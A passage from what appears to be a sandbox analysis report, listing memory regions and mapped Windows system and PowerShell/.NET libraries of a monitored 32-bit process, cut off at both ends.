"private_0x0000000000420000" filename = "" Region: id = 756 start_va = 0x1c40000 end_va = 0x1c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 757 start_va = 0x1c50000 end_va = 0x1c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 758 start_va = 0x1c60000 end_va = 0x1c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 759 start_va = 0x1c70000 end_va = 0x1c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 760 start_va = 0x1c80000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 761 start_va = 0x25d0000 end_va = 0x260ffff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 762 start_va = 0x27c0000 end_va = 0x27fffff entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 763 start_va = 0x2850000 end_va = 0x28effff entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 764 start_va = 0x2a00000 end_va = 0x2a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 765 start_va = 0x2a40000 end_va = 0x2a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 766 start_va = 0x2a50000 end_va = 0x4a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 767 start_va = 0x4ac0000 end_va = 0x4afffff entry_point = 0x0 region_type = private name = "private_0x0000000004ac0000" filename = "" Region: id = 768 start_va = 0x65cf0000 end_va = 0x667e7fff entry_point = 0x65cf0000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll") Region: id = 769 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 770 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 771 start_va = 0x1c90000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 772 start_va = 0x4b00000 end_va = 0x4de1fff entry_point = 0x4d8ec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 773 start_va = 0x654c0000 end_va = 0x65540fff entry_point = 0x654c0000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\microsoft.powershell.consolehost.ni.dll") Region: id = 774 start_va = 0x65550000 end_va = 0x65cebfff entry_point = 0x65550000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll") Region: id = 775 start_va = 0x64950000 end_va = 0x651c9fff entry_point = 0x64950000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4436815b432c313255af322f4ec3560d\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\4436815b432c313255af322f4ec3560d\\system.management.automation.ni.dll") Region: id = 776 start_va = 0x750d0000 end_va = 0x750d8fff entry_point = 0x750d1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 777 start_va = 0x651d0000 end_va = 0x654b1fff entry_point = 0x6545ec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 778 start_va = 0x651d0000 end_va = 0x654b1fff entry_point = 0x6545ec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 779 start_va = 0x1ca0000 end_va = 0x1ca2fff entry_point = 0x1ca0000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\SysWOW64\\l_intl.nls" (normalized: "c:\\windows\\syswow64\\l_intl.nls") Region: id = 780 start_va = 0x4df0000 end_va = 0x4eaffff entry_point = 0x4df0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 781 start_va = 0x758a0000 end_va = 0x758a4fff entry_point = 0x758a1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 782 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 783 start_va = 0x20d0000 end_va = 0x20d4fff entry_point = 0x20d0000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 784 start_va = 0x26d0000 end_va = 0x2710fff entry_point = 0x26d0000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 785 start_va = 0x651d0000 end_va = 0x654b1fff entry_point = 0x6545ec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 786 start_va = 0x651d0000 end_va = 0x654b1fff entry_point = 0x6545ec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 787 start_va = 0x20e0000 end_va = 0x20e7fff entry_point = 0x20e302e region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 788 start_va = 0x20f0000 end_va = 0x20f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020f0000" filename = "" Region: id = 789 start_va = 0x2760000 end_va = 0x27a2fff entry_point = 0x279f03c region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 790 start_va = 0x64560000 end_va = 0x645fbfff entry_point = 0x64560000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll") Region: id = 791 start_va = 0x64600000 end_va = 0x64684fff entry_point = 0x64600000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\ee28a075665b6bc23b6dae56903d431d\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\ee28a075665b6bc23b6dae56903d431d\\microsoft.wsman.management.ni.dll") Region: id = 792 start_va = 0x64690000 end_va = 0x646b4fff entry_point = 0x64690000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll") Region: id = 793 start_va = 0x646c0000 end_va = 0x6470afff entry_point = 0x646c0000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4f68cd04686e5dc5a55070d112d44bdf\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4f68cd04686e5dc5a55070d112d44bdf\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 794 start_va = 0x64710000 end_va = 0x64944fff entry_point = 0x64710000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll") Region: id = 795 start_va = 0x67aa0000 end_va = 0x67ae2fff entry_point = 0x67adf03c region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 796 start_va = 0x2140000 end_va = 0x2140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002140000" filename = "" Region: id = 797 start_va = 0x60340000 end_va = 0x60347fff entry_point = 0x60343809 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll") Region: id = 798 start_va = 0x642c0000 end_va = 0x642ecfff entry_point = 0x642c0000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8ce205027e30804d1b2deaffa0582735\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8ce205027e30804d1b2deaffa0582735\\microsoft.powershell.security.ni.dll") Region: id = 799 start_va = 0x642f0000 end_va = 0x643b2fff entry_point = 0x642f0000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8df695fb80187f65208d87229e81e8a2\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8df695fb80187f65208d87229e81e8a2\\microsoft.powershell.commands.management.ni.dll") Region: id = 800 start_va = 0x643c0000 end_va = 0x6455dfff entry_point = 0x643c0000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\3008a05e2928e2c1d856cc34e0422c17\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\3008a05e2928e2c1d856cc34e0422c17\\microsoft.powershell.commands.utility.ni.dll") Region: id = 801 start_va = 0x2140000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 802 start_va = 0x2960000 end_va = 0x29b3fff entry_point = 0x2960000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll") Region: id = 803 start_va = 0x63b40000 end_va = 0x63b44fff entry_point = 0x63b411d0 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 804 start_va = 0x63b50000 end_va = 0x63c63fff entry_point = 0x63b50000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll") Region: id = 805 start_va = 0x63c70000 end_va = 0x63d73fff entry_point = 0x63c70000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll") Region: id = 806 start_va = 0x63d80000 end_va = 0x642b5fff entry_point = 0x63d80000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll") Region: id = 807 start_va = 0x2150000 end_va = 0x2160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002150000" filename = "" Region: id = 808 start_va = 0x25b0000 end_va = 0x25bffff entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 809 start_va = 0x25c0000 end_va = 0x25cffff entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 810 start_va = 0x2610000 end_va = 0x261ffff entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 811 start_va = 0x2620000 end_va = 0x262ffff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 812 start_va = 0x2670000 end_va = 0x267ffff entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 813 start_va = 0x2680000 end_va = 0x268ffff entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 814 start_va = 0x27b0000 end_va = 0x27bffff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 815 start_va = 0x2800000 end_va = 0x280ffff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 816 start_va = 0x28f0000 end_va = 0x28f0fff entry_point = 0x28f0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 817 start_va = 0x28f0000 end_va = 0x28f0fff entry_point = 0x28f0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 818 start_va = 0x74040000 end_va = 0x74047fff entry_point = 0x740410e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 819 start_va = 0x4eb0000 end_va = 0x4f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004eb0000" filename = "" Region: id = 820 start_va = 0x28f0000 end_va = 0x28fffff entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 821 start_va = 0x2900000 end_va = 0x2900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 822 start_va = 0x4f30000 end_va = 0x5201fff entry_point = 0x51db43c region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 823 start_va = 0x5210000 end_va = 0x54e1fff entry_point = 0x54bb43c region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 824 start_va = 0x634e0000 end_va = 0x63b30fff entry_point = 0x634e0000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Data\\1e85062785e286cd9eae9c26d2c61f73\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.data\\1e85062785e286cd9eae9c26d2c61f73\\system.data.ni.dll") Region: id = 825 start_va = 0x755f0000 end_va = 0x75624fff entry_point = 0x755f145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 826 start_va = 0x75690000 end_va = 0x75695fff entry_point = 0x75691782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 827 start_va = 0x757f0000 end_va = 0x757fbfff entry_point = 0x757f238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 828 start_va = 0x771f0000 end_va = 0x7730cfff entry_point = 0x771f158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 829 start_va = 0x2910000 end_va = 0x291ffff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 830 start_va = 0x29c0000 end_va = 0x29c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029c0000" filename = "" Region: id = 831 start_va = 0x63480000 end_va = 0x634dafff entry_point = 0x634c4d48 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll") Region: id = 832 start_va = 0x29d0000 end_va = 0x29dffff entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 833 start_va = 0x29e0000 end_va = 0x29effff entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 834 start_va = 0x29f0000 end_va = 0x29fffff entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 835 start_va = 0x55b0000 end_va = 0x55effff entry_point = 0x0 region_type = private name = "private_0x00000000055b0000" filename = "" Region: id = 836 start_va = 0x5640000 end_va = 0x5fcffff entry_point = 0x0 region_type = private name = "private_0x0000000005640000" filename = "" Region: id = 837 start_va = 0x74d20000 end_va = 0x74d7efff entry_point = 0x74d22134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 838 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 839 start_va = 0x73890000 end_va = 0x7389dfff entry_point = 0x73891235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 840 start_va = 0x5540000 end_va = 0x557ffff entry_point = 0x0 region_type = private name = "private_0x0000000005540000" filename = "" Region: id = 841 start_va = 0x5600000 end_va = 0x563ffff entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 842 start_va = 0x6000000 end_va = 0x603ffff entry_point = 0x0 region_type = private name = "private_0x0000000006000000" filename = "" Region: id = 843 start_va = 0x6070000 end_va = 0x60affff entry_point = 0x0 region_type = private name = "private_0x0000000006070000" filename = "" Region: id = 844 start_va = 0x60c0000 end_va = 0x60fffff entry_point = 0x0 region_type = private name = "private_0x00000000060c0000" filename = "" Region: id = 845 start_va = 0x61a0000 end_va = 0x61dffff entry_point = 0x0 region_type = private name = "private_0x00000000061a0000" filename = "" Region: id = 846 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 847 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 848 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 849 start_va = 0x63400000 end_va = 0x63429fff entry_point = 0x634013f2 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll") Region: id = 850 start_va = 0x63430000 end_va = 0x63441fff entry_point = 0x63431200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 851 start_va = 0x63450000 end_va = 0x63470fff entry_point = 0x6345e356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 852 start_va = 0x4a50000 end_va = 0x4a5bfff entry_point = 0x4a5e356 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 853 start_va = 0x4a60000 end_va = 0x4a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a60000" filename = "" Region: id = 854 start_va = 0x63300000 end_va = 0x633f0fff entry_point = 0x63300000 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuration\\bc09ad2d49d8535371845cd7532f9271\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuration\\bc09ad2d49d8535371845cd7532f9271\\system.configuration.ni.dll") Region: id = 855 start_va = 0x7ef30000 end_va = 0x7ef3ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef30000" filename = "" Region: id = 856 start_va = 0x7ef40000 end_va = 0x7ef8ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef40000" filename = "" Region: id = 861 start_va = 0x4a70000 end_va = 0x4a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a70000" filename = "" Region: id = 862 start_va = 0x63280000 end_va = 0x63294fff entry_point = 0x632812de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 863 start_va = 0x632a0000 end_va = 0x632f1fff entry_point = 0x632a14be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 864 start_va = 0x63270000 end_va = 0x6327cfff entry_point = 0x63271326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 865 start_va = 0x63230000 end_va = 0x6326bfff entry_point = 0x6323145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 866 start_va = 0x63220000 end_va = 0x63224fff entry_point = 0x632215df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 867 start_va = 0x63210000 end_va = 0x63215fff entry_point = 0x63211673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 868 start_va = 0x4a80000 end_va = 0x4a9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a80000" filename = "" Region: id = 869 start_va = 0x61e0000 end_va = 0x621ffff entry_point = 0x0 region_type = private name = "private_0x00000000061e0000" filename = "" Region: id = 870 start_va = 0x62a0000 end_va = 0x62dffff entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 871 start_va = 0x6320000 end_va = 0x635ffff entry_point = 0x0 region_type = private name = "private_0x0000000006320000" filename = "" Region: id = 872 start_va = 0x63f0000 end_va = 0x642ffff entry_point = 0x0 region_type = private name = "private_0x00000000063f0000" filename = "" Region: id = 873 start_va = 0x67ee0000 end_va = 0x67f2efff entry_point = 0x67ee1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 874 start_va = 0x67f30000 end_va = 0x67f87fff entry_point = 0x67f313b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 875 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 876 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 877 start_va = 0x631f0000 end_va = 0x6320bfff entry_point = 0x631fa431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 878 start_va = 0x631e0000 end_va = 0x631e6fff entry_point = 0x631e128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 879 start_va = 0x6430000 end_va = 0x652ffff entry_point = 0x0 region_type = private name = "private_0x0000000006430000" filename = "" Region: id = 880 start_va = 0x631d0000 end_va = 0x631dcfff entry_point = 0x631d2012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 881 start_va = 0x631b0000 end_va = 0x631c1fff entry_point = 0x631b3271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 882 start_va = 0x631a0000 end_va = 0x631a7fff entry_point = 0x631a34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 883 start_va = 0x6160000 end_va = 0x619ffff entry_point = 0x0 region_type = private name = "private_0x0000000006160000" filename = "" Region: id = 884 start_va = 0x6390000 end_va = 0x63cffff entry_point = 0x0 region_type = private name = "private_0x0000000006390000" filename = "" Region: id = 885 start_va = 0x63150000 end_va = 0x63193fff entry_point = 0x631663f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 886 start_va = 0x7ef92000 end_va = 0x7ef94fff entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 887 start_va = 0x54f0000 end_va = 0x552ffff entry_point = 0x0 region_type = private name = "private_0x00000000054f0000" filename = "" Region: id = 888 start_va = 0x63140000 end_va = 0x63145fff entry_point = 